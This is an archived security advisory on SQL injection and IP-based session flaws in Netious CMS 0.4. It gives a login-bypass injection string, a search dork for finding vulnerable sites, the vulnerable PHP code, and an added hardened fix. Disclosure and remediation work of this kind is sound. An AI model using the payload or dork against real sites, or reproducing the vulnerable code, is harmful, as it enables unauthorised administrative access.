SECURITYVULNS:DOC:13694

Netious CMS <= 0.4 SQL Injection and Session Management Vulnerabilities

2006-08-02 00:00:00
vulners.com


– Jacek Wlodarczyk (j4ck) - jacekwlo[at]gmail[dot]com –



–Title: Netious CMS <= 0.4 SQL Injection and Session Management Vulnerabilities
–Application: Netious CMS
–Version: 0.4 and below
–Url: http://netious.com/
–Dork: "Powered by netious.com"

#Greetz: Baker

–Affected software description:

–Improperly sanitized input can be used to inject a crafted SQL query
–and allows an attacker to log in with admin privileges. An attacker
–can also log in as admin because of a bug in session management.
–Every time the admin logs in with proper credentials, the SID is always
–the same for the same IP address. While the admin is logged in, anyone
–with the same IP (behind the same NAT, proxy, etc.) can go
–to /cms/admin.php and will have admin rights.
–For the SQL injection, magic_quotes_gpc must be off.

–Exploit:

Go -> http://host.com/CMSpath/cms/
Username: j4ck' or 1=1/*
Password: blank

Vulnerable code (SQL injection):
cms/log.php - lines: 9 - 29:

// $username is concatenated into the query without escaping
$result=mysql_query("SELECT AdminId FROM mycmsadmin WHERE username='$username' and password='".sha1($password)."'");
$row=mysql_fetch_row($result);
$num_rows = mysql_num_rows($result);
$id=$row[0];

if ($num_rows==1){
    // session id is derived only from the client IP, so it is the same for every client sharing that IP
    $SID=f_ip2dec($REMOTE_ADDR);
    if (!session_id($SID))
        session_start();
    if (!session_is_registered('signed_in'))
        session_register('signed_in');
    $signed_in = "indeed";
    session_register('uname');
    $uname = $username;
    session_register('pass'); // plaintext password is kept in the session
    $pass = $password;

    if ($id=="1"){
        Header( "Location: admin.php");
    }

Vulnerable code 2 (session management):
cms/admin.php - lines: 11 - 27:

// same IP-derived session id as in log.php; any client with that IP resumes the admin's session
$SUID=f_ip2dec($REMOTE_ADDR);
if (!session_id($SUID))
    session_start();

$username=$_SESSION['uname'];
$password=$_SESSION['pass'];

// credentials stored by log.php are re-queried with the same unescaped concatenation
$result=mysql_query("SELECT AdminId FROM mycmsadmin WHERE username='$username' and password='".sha1($password)."'");
$row=mysql_fetch_row($result);
$num_rows = mysql_num_rows($result);
$id=$row[0];

if ($_SESSION['signed_in']!='indeed' || $num_rows!=1 || $id!=1){
    Header( "Location: index.php?action=2");
}else{ // admin control panel follows
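A hardened replacement for the two excerpts above, added here as an example (it is not Netious CMS code). It assumes a PDO connection to the same `mycmsadmin` table with columns `AdminId`, `username` and `password` (sha1 hashes, as in the original); the function names `admin_login` and `require_admin` are hypothetical.

```php
<?php
// Added example, not Netious CMS code. Assumes PDO against the same
// mycmsadmin table (AdminId, username, password = sha1 hash).

function admin_login(PDO $db, string $username, string $password): bool
{
    // Parameterised query: the username is bound as data, so a value
    // such as "j4ck' or 1=1/*" cannot change the query structure. The
    // sha1 comparison is kept only because that is what the table stores.
    $stmt = $db->prepare(
        'SELECT AdminId FROM mycmsadmin WHERE username = ? AND password = ?'
    );
    $stmt->execute([$username, sha1($password)]);
    $rows = $stmt->fetchAll(PDO::FETCH_COLUMN);

    // Exactly one match, and it must be the admin row (AdminId 1).
    if (count($rows) !== 1 || (int) $rows[0] !== 1) {
        return false;
    }

    // Let PHP pick a random session id instead of deriving it from
    // REMOTE_ADDR, and rotate it on login so an id that another client
    // on the same IP already holds is never promoted to admin.
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    session_regenerate_id(true);

    // Store only the identity, never the plaintext credentials.
    $_SESSION['admin_id'] = (int) $rows[0];
    return true;
}

function require_admin(): void
{
    // Replacement for the check at the top of cms/admin.php: no re-query
    // with credentials pulled out of the session, just the stored identity.
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['admin_id']) || $_SESSION['admin_id'] !== 1) {
        header('Location: index.php?action=2');
        exit;
    }
}
```

Pair this with `session.use_strict_mode=1` in php.ini so the server refuses session ids it did not generate itself.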